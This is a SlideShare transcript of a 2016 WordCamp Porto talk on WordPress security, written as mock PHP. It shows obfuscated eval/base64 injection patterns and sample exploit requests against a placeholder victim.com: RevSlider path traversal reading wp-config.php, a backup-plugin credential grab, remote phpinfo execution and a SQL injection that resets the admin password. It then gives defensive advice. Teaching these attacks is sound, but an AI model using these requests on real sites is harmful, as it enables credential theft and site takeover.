SlideShare a Scribd company logo
$talk =“Segurança_e_mobilidade”;
$where = date_default_timezone_set(‘Europe/Porto');
$date = '2016-05-14 12:00:00’;
start();
/* Início */
/* Apresentação */
$who =“Marcel Schmitz”;
$role =“CTO + web & mobile developer”;
$where =“hellodev.us”;
$email =“marcel@hellodev.us”;
/* Apresentação */
/* Primeiros contactos com sites
comprometidos */
-rw-r--r-- 1 root root 3012 May 11 09:59 index.php
/* Source: Wordfence March 2016 */
/* Primeiros contactos com sites
comprometidos */
<?php
// Silence is golden.
/* Primeiros contactos com sites
comprometidos */
<?php
// Silence is golden.
$x =“NFbkn
veorgASDgaskdhfkashdfpwehibvasipdhvaipegaiweHFAPEIgaPIyeiaaipwehgwEG
$34h293gHW)EHG(QHgQ(WEGH#$)GhQªGH)EHGQ3223nfk2n3f23nçkfn2ç34”;

$r=eval(gzinflate(str_rot13(base64_decode($x))));
/* Como uma instalação de
WordPress pode ser
comprometida */
// RESPONSIBLE FOR 70% OF THE ATTACKS

$first =“plugin”;
$second =“brute force”;
// OTHER 30%
$other = array(“code”, ”theme”, ”hosting”, ”file permissions”);
/* Source: Wordfence March 2016 */
/* O que fazem depois? */
// MOST OF THEM

$first_choice =“deface or take offline”;
$second_choice =“send spam”;
$third_choice =“seo spam”;
$other =“redirect”;
/* Source: Wordfence March 2016 */
/* Site comprometido por um
plugin */
// MOST COMMON METHOD
$using_method =“Local File Inclusion (LFI) attack.”;
// EXAMPLE - INJECTED CODE
<?php ${“Gx4cOx42x41x4cx53"}["x69wirx72x63x66x76"]="x69";${"x47Lx4fx42ALx53"}
["x61rx6bmx64z"]="mx6bx41x72r";${"x47x4cOx42x41x4cS"}["ex6ax71x68x68j
x6c"]="x6dx6bx5ftx65x6dp";${"GLOx42x41x4cx53"}["x72x66lx73x65x76x68m
x67x68x79"]="x73tx72x69x70Ax72x72";${"Gx4cx4fx42x41x4cx53"}["v
x72x72x71x78x6dx6dx77y"]="x63ax74x5fcross";${"x47x4cx4fx42ALx53"}
["x72x73x77x70x61x6cx78tx62x79n"]="tex6dx70lx61te";${"GLx4fx42Ax4cx53"}["g
x78x67ycx74x71x73"]="tx69tlx65"; ?>
/* Site comprometido por um
plugin */
// EXAMPLE - DOWNLOAD WP-CONFIG.PHP FILE - REVSLIDER
$wpconfig_content = file_get_contents(“http://victim.com/wp-admin/admin-
ajax.php?action=revslider_show_image&img=../wp-config.php”);
/* Source: http://finalphoenix.me/ */
/* Site comprometido por um
plugin */
// EXAMPLE - PHPINFO WITH CONSTANTS OR DOWNLOADING BACKUPS OR
UPLOADING FILES
$nonce = file_get_contents(“http://victim.com/wp-admin/admin.php?
action=upgrade-plugin”);

$credentials = file_get_contents(“http://victim.com/wp-admin/admin.php?
action=updraft_ajax_handler&nonce=$nonce”);
/* Source: http://finalphoenix.me/ */
/* Site comprometido por um
plugin */
// EXAMPLE - EXECUTING SCRIPTS
$script_to_execute =“phpinfo()”;

$content_of_phpinfo = file_get_contents(“http://victim.com/wp-admin/
admin-post.php?action=wp_ajax_easymedia_imgresize_ajax?imgurl=
$script_to_execute”);
/* Source: http://finalphoenix.me/ */
/* Site comprometido por um
plugin */
// EXAMPLE - DATABASE INJECTION (MISSING ASCII TO HTML CODE CONVERSION)
$context = …
$query_to_inject =“update wp_users set password=md5(‘123’) where id=1”;

$chage_password = file_get_contents(“http://victim.com/wp-admin/admin.php?
page=aiowpsec&tab=tab1&orderby=$query_to_inject”, false, $context);
/* Source: http://finalphoenix.me/ */
/* Site comprometido por um
plugin */
// HOW TO PROTECT AGAINST ATTACKS THROUGH PLUGINS?
$simple_solution =“update, update, update!”;
$other_tips = array (“dont use old plugins”,“search for news about security
issues”,“take a look at the code”);
/* Site comprometido por brute
force */
// PASSWORD GUESSING ATTACK
$tips = array(“dont user obvious usernames”,“dont use simple passwords”,“create a new admin
account”);

$how_to_avoid =“two factor authentication”;
$other_solution = array(“change /wp-admin”,“blacklist IPs trying to login and failing for more than
x times”);
/* Site comprometido por outros
motivos */
// SET THE CORRECT PERMISSIONS
$folders =“0755”;
$files =“0644”;
$wp_config =“0444”;
$htaccess =“0444”;
/* Site comprometido por outros
motivos */
// SET THE CORRECT .HTACCESS CONTENT
$things_you_can_do = array(“block IPs”,“protect files”,“allow certain file
extensions from wp_content/*”);
/* Site comprometido por outros
motivos */
// HAVE LATEST OS UPDATES INSTALLED
if ($i_have_a_server() == true) { update_os(); }
/* Atualizar, sempre! */
// UPDATE PLUGINS, UPDATE CORE INSTALATION, UPDATE THEMES
$always_update = true;
/* Plugins que ajudam */
// SECURITY PLUGINS

install_plugin_by_slug(‘wordfence’);
install_plugin_by_slug(‘sucuri-scanner’);
install_plugin_by_slug(‘better-wp-security’); // iThemes Security
install_plugin_by_slug(‘google-authenticator’);
/* A nossa solução, aberta para
todos */
// OUR PROBLEMS, YOUR PROBLEMS, SHARING A SOLUTION
$new_approach = install_hellosys();
// MOBILE APP
$name =“HELLOSYS”
/* A nossa solução, aberta para
todos */
// ENTER BETA, STAY TUNED
$url =“http://hellodev.us”;
$talk =“Segurança_e_mobilidade”;
$where = date_default_timezone_set(‘Europe/Porto');
$date = '2016-05-14 12:20:00’;
thank_you();
/* Fim */

More Related Content

What's hot

London XQuery Meetup: Querying the World (Web Scraping)
London XQuery Meetup: Querying the World (Web Scraping)London XQuery Meetup: Querying the World (Web Scraping)
London XQuery Meetup: Querying the World (Web Scraping)
Dennis Knochenwefel
 
Php
PhpPhp
LAMP_TRAINING_SESSION_8
LAMP_TRAINING_SESSION_8LAMP_TRAINING_SESSION_8
LAMP_TRAINING_SESSION_8
umapst
 
M.php
M.phpM.php
Beginning web programming with PHP [PHP 101-02]
Beginning web programming with PHP [PHP 101-02]Beginning web programming with PHP [PHP 101-02]
Beginning web programming with PHP [PHP 101-02]
Mozammel Haque
 
Pemrograman Web 9 - Input Form DB dan Session
Pemrograman Web 9 - Input Form DB dan SessionPemrograman Web 9 - Input Form DB dan Session
Pemrograman Web 9 - Input Form DB dan Session
Nur Fadli Utomo
 
Migrare da symfony 1 a Symfony2
 Migrare da symfony 1 a Symfony2  Migrare da symfony 1 a Symfony2
Migrare da symfony 1 a Symfony2
Massimiliano Arione
 
HOW TO UPLOAD AND DISPLAY IMAGE PHP HTML SQL
HOW TO UPLOAD AND DISPLAY IMAGE PHP HTML SQLHOW TO UPLOAD AND DISPLAY IMAGE PHP HTML SQL
HOW TO UPLOAD AND DISPLAY IMAGE PHP HTML SQL
mauricemuteti2015
 
Pemrograman Web 8 - MySQL
Pemrograman Web 8 - MySQLPemrograman Web 8 - MySQL
Pemrograman Web 8 - MySQL
Nur Fadli Utomo
 
Cpsh sh
Cpsh shCpsh sh
Cpsh sh
Ben Pope
 
Php (1)
Php (1)Php (1)
Php (1)
pinalsadiwala
 
7b615dc2-ba86-4ecd-8b1f-d0d32de89a0c-160302154344
7b615dc2-ba86-4ecd-8b1f-d0d32de89a0c-1603021543447b615dc2-ba86-4ecd-8b1f-d0d32de89a0c-160302154344
7b615dc2-ba86-4ecd-8b1f-d0d32de89a0c-160302154344
Branislav Simandel
 
H4x0rs gonna hack
H4x0rs gonna hackH4x0rs gonna hack
H4x0rs gonna hack
Xchym Hiệp
 
Ros eyes ros-robots
Ros eyes ros-robotsRos eyes ros-robots
Ros eyes ros-robots
Tatsuya Fukuta
 
kazumich@acmscamp2010spring
kazumich@acmscamp2010springkazumich@acmscamp2010spring
kazumich@acmscamp2010spring
Kazumich YAMAMOTO
 
Declarations sample
Declarations   sampleDeclarations   sample
Declarations sample
aslamsan
 
An Introduction to Jquery
An Introduction to JqueryAn Introduction to Jquery
An Introduction to Jquery
Phil Reither
 
次世代版 PowerCMS 開発プロジェクトのご紹介
次世代版 PowerCMS 開発プロジェクトのご紹介次世代版 PowerCMS 開発プロジェクトのご紹介
次世代版 PowerCMS 開発プロジェクトのご紹介
純生 野田
 
PowerCMS X
PowerCMS XPowerCMS X
PowerCMS X
純生 野田
 

What's hot (19)

London XQuery Meetup: Querying the World (Web Scraping)
London XQuery Meetup: Querying the World (Web Scraping)London XQuery Meetup: Querying the World (Web Scraping)
London XQuery Meetup: Querying the World (Web Scraping)
 
Php
PhpPhp
Php
 
LAMP_TRAINING_SESSION_8
LAMP_TRAINING_SESSION_8LAMP_TRAINING_SESSION_8
LAMP_TRAINING_SESSION_8
 
M.php
M.phpM.php
M.php
 
Beginning web programming with PHP [PHP 101-02]
Beginning web programming with PHP [PHP 101-02]Beginning web programming with PHP [PHP 101-02]
Beginning web programming with PHP [PHP 101-02]
 
Pemrograman Web 9 - Input Form DB dan Session
Pemrograman Web 9 - Input Form DB dan SessionPemrograman Web 9 - Input Form DB dan Session
Pemrograman Web 9 - Input Form DB dan Session
 
Migrare da symfony 1 a Symfony2
 Migrare da symfony 1 a Symfony2  Migrare da symfony 1 a Symfony2
Migrare da symfony 1 a Symfony2
 
HOW TO UPLOAD AND DISPLAY IMAGE PHP HTML SQL
HOW TO UPLOAD AND DISPLAY IMAGE PHP HTML SQLHOW TO UPLOAD AND DISPLAY IMAGE PHP HTML SQL
HOW TO UPLOAD AND DISPLAY IMAGE PHP HTML SQL
 
Pemrograman Web 8 - MySQL
Pemrograman Web 8 - MySQLPemrograman Web 8 - MySQL
Pemrograman Web 8 - MySQL
 
Cpsh sh
Cpsh shCpsh sh
Cpsh sh
 
Php (1)
Php (1)Php (1)
Php (1)
 
7b615dc2-ba86-4ecd-8b1f-d0d32de89a0c-160302154344
7b615dc2-ba86-4ecd-8b1f-d0d32de89a0c-1603021543447b615dc2-ba86-4ecd-8b1f-d0d32de89a0c-160302154344
7b615dc2-ba86-4ecd-8b1f-d0d32de89a0c-160302154344
 
H4x0rs gonna hack
H4x0rs gonna hackH4x0rs gonna hack
H4x0rs gonna hack
 
Ros eyes ros-robots
Ros eyes ros-robotsRos eyes ros-robots
Ros eyes ros-robots
 
kazumich@acmscamp2010spring
kazumich@acmscamp2010springkazumich@acmscamp2010spring
kazumich@acmscamp2010spring
 
Declarations sample
Declarations   sampleDeclarations   sample
Declarations sample
 
An Introduction to Jquery
An Introduction to JqueryAn Introduction to Jquery
An Introduction to Jquery
 
次世代版 PowerCMS 開発プロジェクトのご紹介
次世代版 PowerCMS 開発プロジェクトのご紹介次世代版 PowerCMS 開発プロジェクトのご紹介
次世代版 PowerCMS 開発プロジェクトのご紹介
 
PowerCMS X
PowerCMS XPowerCMS X
PowerCMS X
 

Viewers also liked

ÁNGULOS INSCRITOS EN LA CIRCUNFERENCIA
ÁNGULOS INSCRITOS EN LA CIRCUNFERENCIAÁNGULOS INSCRITOS EN LA CIRCUNFERENCIA
ÁNGULOS INSCRITOS EN LA CIRCUNFERENCIA
Lorena Toledo Lizana
 
ABDULAKBARTHARAYIL
ABDULAKBARTHARAYILABDULAKBARTHARAYIL
ABDULAKBARTHARAYIL
Abdul Akbar
 
mi visita a secondlifeond life
mi visita a secondlifeond lifemi visita a secondlifeond life
mi visita a secondlifeond life
Carlos Gallardo
 
Cierre
CierreCierre
TEOREMA DE WILSON Y PEQUEÑO DE FERMAT
TEOREMA DE WILSON Y PEQUEÑO DE FERMATTEOREMA DE WILSON Y PEQUEÑO DE FERMAT
TEOREMA DE WILSON Y PEQUEÑO DE FERMAT
Lorena Toledo Lizana
 
Лідер бізнесу: Джозеф Вільям Фостер
Лідер бізнесу: Джозеф Вільям Фостер Лідер бізнесу: Джозеф Вільям Фостер
Лідер бізнесу: Джозеф Вільям Фостер
ann prykhodko
 
Lorena
LorenaLorena
Androreyes16161896
Androreyes16161896Androreyes16161896
Androreyes16161896
Andro Jose Reyes
 
แผนที16
แผนที16แผนที16
แผนที16
wiriyakit kettong
 
Ділова гра "Нарада"
Ділова гра "Нарада"Ділова гра "Нарада"
Ділова гра "Нарада"
ann prykhodko
 
.Net 7.1 years Vijay_Thakare
.Net 7.1 years Vijay_Thakare.Net 7.1 years Vijay_Thakare
.Net 7.1 years Vijay_Thakare
Vijay Thakare
 
TEOREMA DE WILSON Y TEOREMA PEQUEÑO DE FERMAT
TEOREMA DE WILSON Y TEOREMA PEQUEÑO DE FERMATTEOREMA DE WILSON Y TEOREMA PEQUEÑO DE FERMAT
TEOREMA DE WILSON Y TEOREMA PEQUEÑO DE FERMAT
Lorena Toledo Lizana
 
Zambia Presentation
Zambia PresentationZambia Presentation
Zambia Presentation
Jemma Casey
 
Compendio Produccion de Hidrocarburos Tomo II.
Compendio Produccion de Hidrocarburos Tomo II. Compendio Produccion de Hidrocarburos Tomo II.
Compendio Produccion de Hidrocarburos Tomo II.
Alberto Augusto Abarca Zambrano
 
Building scalable applications with hazelcast
Building scalable applications with hazelcastBuilding scalable applications with hazelcast
Building scalable applications with hazelcast
Fuad Malikov
 

Viewers also liked (15)

ÁNGULOS INSCRITOS EN LA CIRCUNFERENCIA
ÁNGULOS INSCRITOS EN LA CIRCUNFERENCIAÁNGULOS INSCRITOS EN LA CIRCUNFERENCIA
ÁNGULOS INSCRITOS EN LA CIRCUNFERENCIA
 
ABDULAKBARTHARAYIL
ABDULAKBARTHARAYILABDULAKBARTHARAYIL
ABDULAKBARTHARAYIL
 
mi visita a secondlifeond life
mi visita a secondlifeond lifemi visita a secondlifeond life
mi visita a secondlifeond life
 
Cierre
CierreCierre
Cierre
 
TEOREMA DE WILSON Y PEQUEÑO DE FERMAT
TEOREMA DE WILSON Y PEQUEÑO DE FERMATTEOREMA DE WILSON Y PEQUEÑO DE FERMAT
TEOREMA DE WILSON Y PEQUEÑO DE FERMAT
 
Лідер бізнесу: Джозеф Вільям Фостер
Лідер бізнесу: Джозеф Вільям Фостер Лідер бізнесу: Джозеф Вільям Фостер
Лідер бізнесу: Джозеф Вільям Фостер
 
Lorena
LorenaLorena
Lorena
 
Androreyes16161896
Androreyes16161896Androreyes16161896
Androreyes16161896
 
แผนที16
แผนที16แผนที16
แผนที16
 
Ділова гра "Нарада"
Ділова гра "Нарада"Ділова гра "Нарада"
Ділова гра "Нарада"
 
.Net 7.1 years Vijay_Thakare
.Net 7.1 years Vijay_Thakare.Net 7.1 years Vijay_Thakare
.Net 7.1 years Vijay_Thakare
 
TEOREMA DE WILSON Y TEOREMA PEQUEÑO DE FERMAT
TEOREMA DE WILSON Y TEOREMA PEQUEÑO DE FERMATTEOREMA DE WILSON Y TEOREMA PEQUEÑO DE FERMAT
TEOREMA DE WILSON Y TEOREMA PEQUEÑO DE FERMAT
 
Zambia Presentation
Zambia PresentationZambia Presentation
Zambia Presentation
 
Compendio Produccion de Hidrocarburos Tomo II.
Compendio Produccion de Hidrocarburos Tomo II. Compendio Produccion de Hidrocarburos Tomo II.
Compendio Produccion de Hidrocarburos Tomo II.
 
Building scalable applications with hazelcast
Building scalable applications with hazelcastBuilding scalable applications with hazelcast
Building scalable applications with hazelcast
 

Similar to Security and Mobility - WordCamp Porto 2016

My shell
My shellMy shell
My shell
Ahmed Salah
 
Twas the night before Malware...
Twas the night before Malware...Twas the night before Malware...
Twas the night before Malware...
DoktorMandrake
 
Php
PhpPhp
Mojolicious. Веб в коробке!
Mojolicious. Веб в коробке!Mojolicious. Веб в коробке!
Mojolicious. Веб в коробке!
Anatoly Sharifulin
 
PHP SA 2014 - Releasing Your Open Source Project
PHP SA 2014 - Releasing Your Open Source ProjectPHP SA 2014 - Releasing Your Open Source Project
PHP SA 2014 - Releasing Your Open Source Project
xsist10
 
Mac OS X Lion で作る WordPress local 環境
Mac OS X Lion で作る WordPress local 環境Mac OS X Lion で作る WordPress local 環境
Mac OS X Lion で作る WordPress local 環境
Yuriko IKEDA
 
Php talk
Php talkPhp talk
Php talk
Jamil Ramsey
 
Micropage in microtime using microframework
Micropage in microtime using microframeworkMicropage in microtime using microframework
Micropage in microtime using microframework
Radek Benkel
 
Php Security
Php SecurityPhp Security
Php Security
guest7cf35c
 
Nette framework (WebElement #28)
Nette framework (WebElement #28)Nette framework (WebElement #28)
Nette framework (WebElement #28)
Adam Štipák
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
Slawomir Jasek
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
SecuRing
 
Hack and Slash: Secure Coding
Hack and Slash: Secure CodingHack and Slash: Secure Coding
Hack and Slash: Secure Coding
Prathan Phongthiproek
 
Building Modern and Secure PHP Applications – Codementor Office Hours with Be...
Building Modern and Secure PHP Applications – Codementor Office Hours with Be...Building Modern and Secure PHP Applications – Codementor Office Hours with Be...
Building Modern and Secure PHP Applications – Codementor Office Hours with Be...
Arc & Codementor
 
C99[2]
C99[2]C99[2]
C99[2]
guest8914af
 
Web application security
Web application securityWeb application security
Web application security
Ravi Raj
 
Developer Security for WordPress
Developer Security for WordPressDeveloper Security for WordPress
Developer Security for WordPress
Brandon Dove
 
Daily notes
Daily notesDaily notes
Daily notes
meghendra168
 
Web 8 | Introduction to PHP
Web 8 | Introduction to PHPWeb 8 | Introduction to PHP
Web 8 | Introduction to PHP
Mohammad Imam Hossain
 
Asynchronous PHP and Real-time Messaging
Asynchronous PHP and Real-time MessagingAsynchronous PHP and Real-time Messaging
Asynchronous PHP and Real-time Messaging
Steve Rhoades
 

Similar to Security and Mobility - WordCamp Porto 2016 (20)

My shell
My shellMy shell
My shell
 
Twas the night before Malware...
Twas the night before Malware...Twas the night before Malware...
Twas the night before Malware...
 
Php
PhpPhp
Php
 
Mojolicious. Веб в коробке!
Mojolicious. Веб в коробке!Mojolicious. Веб в коробке!
Mojolicious. Веб в коробке!
 
PHP SA 2014 - Releasing Your Open Source Project
PHP SA 2014 - Releasing Your Open Source ProjectPHP SA 2014 - Releasing Your Open Source Project
PHP SA 2014 - Releasing Your Open Source Project
 
Mac OS X Lion で作る WordPress local 環境
Mac OS X Lion で作る WordPress local 環境Mac OS X Lion で作る WordPress local 環境
Mac OS X Lion で作る WordPress local 環境
 
Php talk
Php talkPhp talk
Php talk
 
Micropage in microtime using microframework
Micropage in microtime using microframeworkMicropage in microtime using microframework
Micropage in microtime using microframework
 
Php Security
Php SecurityPhp Security
Php Security
 
Nette framework (WebElement #28)
Nette framework (WebElement #28)Nette framework (WebElement #28)
Nette framework (WebElement #28)
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
 
Hack and Slash: Secure Coding
Hack and Slash: Secure CodingHack and Slash: Secure Coding
Hack and Slash: Secure Coding
 
Building Modern and Secure PHP Applications – Codementor Office Hours with Be...
Building Modern and Secure PHP Applications – Codementor Office Hours with Be...Building Modern and Secure PHP Applications – Codementor Office Hours with Be...
Building Modern and Secure PHP Applications – Codementor Office Hours with Be...
 
C99[2]
C99[2]C99[2]
C99[2]
 
Web application security
Web application securityWeb application security
Web application security
 
Developer Security for WordPress
Developer Security for WordPressDeveloper Security for WordPress
Developer Security for WordPress
 
Daily notes
Daily notesDaily notes
Daily notes
 
Web 8 | Introduction to PHP
Web 8 | Introduction to PHPWeb 8 | Introduction to PHP
Web 8 | Introduction to PHP
 
Asynchronous PHP and Real-time Messaging
Asynchronous PHP and Real-time MessagingAsynchronous PHP and Real-time Messaging
Asynchronous PHP and Real-time Messaging
 

Recently uploaded

Programming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup SlidesProgramming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup Slides
Zilliz
 
dbms calicut university B. sc Cs 4th sem.pdf
dbms  calicut university B. sc Cs 4th sem.pdfdbms  calicut university B. sc Cs 4th sem.pdf
dbms calicut university B. sc Cs 4th sem.pdf
Shinana2
 
Skybuffer AI: Advanced Conversational and Generative AI Solution on SAP Busin...
Skybuffer AI: Advanced Conversational and Generative AI Solution on SAP Busin...Skybuffer AI: Advanced Conversational and Generative AI Solution on SAP Busin...
Skybuffer AI: Advanced Conversational and Generative AI Solution on SAP Busin...
Tatiana Kojar
 
leewayhertz.com-AI in predictive maintenance Use cases technologies benefits ...
leewayhertz.com-AI in predictive maintenance Use cases technologies benefits ...leewayhertz.com-AI in predictive maintenance Use cases technologies benefits ...
leewayhertz.com-AI in predictive maintenance Use cases technologies benefits ...
alexjohnson7307
 
Introduction of Cybersecurity with OSS at Code Europe 2024
Introduction of Cybersecurity with OSS  at Code Europe 2024Introduction of Cybersecurity with OSS  at Code Europe 2024
Introduction of Cybersecurity with OSS at Code Europe 2024
Hiroshi SHIBATA
 
Finale of the Year: Apply for Next One!
Finale of the Year: Apply for Next One!Finale of the Year: Apply for Next One!
Finale of the Year: Apply for Next One!
GDSC PJATK
 
Ocean lotus Threat actors project by John Sitima 2024 (1).pptx
Ocean lotus Threat actors project by John Sitima 2024 (1).pptxOcean lotus Threat actors project by John Sitima 2024 (1).pptx
Ocean lotus Threat actors project by John Sitima 2024 (1).pptx
SitimaJohn
 
Deep Dive: Getting Funded with Jason Jason Lemkin Founder & CEO @ SaaStr
Deep Dive: Getting Funded with Jason Jason Lemkin Founder & CEO @ SaaStrDeep Dive: Getting Funded with Jason Jason Lemkin Founder & CEO @ SaaStr
Deep Dive: Getting Funded with Jason Jason Lemkin Founder & CEO @ SaaStr
saastr
 
Recommendation System using RAG Architecture
Recommendation System using RAG ArchitectureRecommendation System using RAG Architecture
Recommendation System using RAG Architecture
fredae14
 
Generating privacy-protected synthetic data using Secludy and Milvus
Generating privacy-protected synthetic data using Secludy and MilvusGenerating privacy-protected synthetic data using Secludy and Milvus
Generating privacy-protected synthetic data using Secludy and Milvus
Zilliz
 
June Patch Tuesday
June Patch TuesdayJune Patch Tuesday
June Patch Tuesday
Ivanti
 
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
saastr
 
Fueling AI with Great Data with Airbyte Webinar
Fueling AI with Great Data with Airbyte WebinarFueling AI with Great Data with Airbyte Webinar
Fueling AI with Great Data with Airbyte Webinar
Zilliz
 
Choosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptxChoosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptx
Brandon Minnick, MBA
 
Presentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of GermanyPresentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of Germany
innovationoecd
 
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUHCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
panagenda
 
Serial Arm Control in Real Time Presentation
Serial Arm Control in Real Time PresentationSerial Arm Control in Real Time Presentation
Serial Arm Control in Real Time Presentation
tolgahangng
 
Building Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and MilvusBuilding Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and Milvus
Zilliz
 
Monitoring and Managing Anomaly Detection on OpenShift.pdf
Monitoring and Managing Anomaly Detection on OpenShift.pdfMonitoring and Managing Anomaly Detection on OpenShift.pdf
Monitoring and Managing Anomaly Detection on OpenShift.pdf
Tosin Akinosho
 
TrustArc Webinar - 2024 Global Privacy Survey
TrustArc Webinar - 2024 Global Privacy SurveyTrustArc Webinar - 2024 Global Privacy Survey
TrustArc Webinar - 2024 Global Privacy Survey
TrustArc
 

Recently uploaded (20)

Programming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup SlidesProgramming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup Slides
 
dbms calicut university B. sc Cs 4th sem.pdf
dbms  calicut university B. sc Cs 4th sem.pdfdbms  calicut university B. sc Cs 4th sem.pdf
dbms calicut university B. sc Cs 4th sem.pdf
 
Skybuffer AI: Advanced Conversational and Generative AI Solution on SAP Busin...
Skybuffer AI: Advanced Conversational and Generative AI Solution on SAP Busin...Skybuffer AI: Advanced Conversational and Generative AI Solution on SAP Busin...
Skybuffer AI: Advanced Conversational and Generative AI Solution on SAP Busin...
 
leewayhertz.com-AI in predictive maintenance Use cases technologies benefits ...
leewayhertz.com-AI in predictive maintenance Use cases technologies benefits ...leewayhertz.com-AI in predictive maintenance Use cases technologies benefits ...
leewayhertz.com-AI in predictive maintenance Use cases technologies benefits ...
 
Introduction of Cybersecurity with OSS at Code Europe 2024
Introduction of Cybersecurity with OSS  at Code Europe 2024Introduction of Cybersecurity with OSS  at Code Europe 2024
Introduction of Cybersecurity with OSS at Code Europe 2024
 
Finale of the Year: Apply for Next One!
Finale of the Year: Apply for Next One!Finale of the Year: Apply for Next One!
Finale of the Year: Apply for Next One!
 
Ocean lotus Threat actors project by John Sitima 2024 (1).pptx
Ocean lotus Threat actors project by John Sitima 2024 (1).pptxOcean lotus Threat actors project by John Sitima 2024 (1).pptx
Ocean lotus Threat actors project by John Sitima 2024 (1).pptx
 
Deep Dive: Getting Funded with Jason Jason Lemkin Founder & CEO @ SaaStr
Deep Dive: Getting Funded with Jason Jason Lemkin Founder & CEO @ SaaStrDeep Dive: Getting Funded with Jason Jason Lemkin Founder & CEO @ SaaStr
Deep Dive: Getting Funded with Jason Jason Lemkin Founder & CEO @ SaaStr
 
Recommendation System using RAG Architecture
Recommendation System using RAG ArchitectureRecommendation System using RAG Architecture
Recommendation System using RAG Architecture
 
Generating privacy-protected synthetic data using Secludy and Milvus
Generating privacy-protected synthetic data using Secludy and MilvusGenerating privacy-protected synthetic data using Secludy and Milvus
Generating privacy-protected synthetic data using Secludy and Milvus
 
June Patch Tuesday
June Patch TuesdayJune Patch Tuesday
June Patch Tuesday
 
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
Deep Dive: AI-Powered Marketing to Get More Leads and Customers with HyperGro...
 
Fueling AI with Great Data with Airbyte Webinar
Fueling AI with Great Data with Airbyte WebinarFueling AI with Great Data with Airbyte Webinar
Fueling AI with Great Data with Airbyte Webinar
 
Choosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptxChoosing The Best AWS Service For Your Website + API.pptx
Choosing The Best AWS Service For Your Website + API.pptx
 
Presentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of GermanyPresentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of Germany
 
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUHCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
 
Serial Arm Control in Real Time Presentation
Serial Arm Control in Real Time PresentationSerial Arm Control in Real Time Presentation
Serial Arm Control in Real Time Presentation
 
Building Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and MilvusBuilding Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and Milvus
 
Monitoring and Managing Anomaly Detection on OpenShift.pdf
Monitoring and Managing Anomaly Detection on OpenShift.pdfMonitoring and Managing Anomaly Detection on OpenShift.pdf
Monitoring and Managing Anomaly Detection on OpenShift.pdf
 
TrustArc Webinar - 2024 Global Privacy Survey
TrustArc Webinar - 2024 Global Privacy SurveyTrustArc Webinar - 2024 Global Privacy Survey
TrustArc Webinar - 2024 Global Privacy Survey
 

Security and Mobility - WordCamp Porto 2016

  • 1. $talk =“Segurança_e_mobilidade”; $where = date_default_timezone_set(‘Europe/Porto'); $date = '2016-05-14 12:00:00’; start(); /* Início */
  • 2. /* Apresentação */ $who =“Marcel Schmitz”; $role =“CTO + web & mobile developer”; $where =“hellodev.us”; $email =“marcel@hellodev.us”;
  • 4.
  • 5.
  • 6. /* Primeiros contactos com sites comprometidos */ -rw-r--r-- 1 root root 3012 May 11 09:59 index.php /* Source: Wordfence March 2016 */
  • 7. /* Primeiros contactos com sites comprometidos */ <?php // Silence is golden.
  • 8. /* Primeiros contactos com sites comprometidos */ <?php // Silence is golden. $x =“NFbkn veorgASDgaskdhfkashdfpwehibvasipdhvaipegaiweHFAPEIgaPIyeiaaipwehgwEG $34h293gHW)EHG(QHgQ(WEGH#$)GhQªGH)EHGQ3223nfk2n3f23nçkfn2ç34”;
 $r=eval(gzinflate(str_rot13(base64_decode($x))));
  • 9.
  • 10. /* Como uma instalação de WordPress pode ser comprometida */ // RESPONSIBLE FOR 70% OF THE ATTACKS
 $first =“plugin”; $second =“brute force”; // OTHER 30% $other = array(“code”, ”theme”, ”hosting”, ”file permissions”); /* Source: Wordfence March 2016 */
  • 11. /* O que fazem depois? */ // MOST OF THEM
 $first_choice =“deface or take offline”; $second_choice =“send spam”; $third_choice =“seo spam”; $other =“redirect”; /* Source: Wordfence March 2016 */
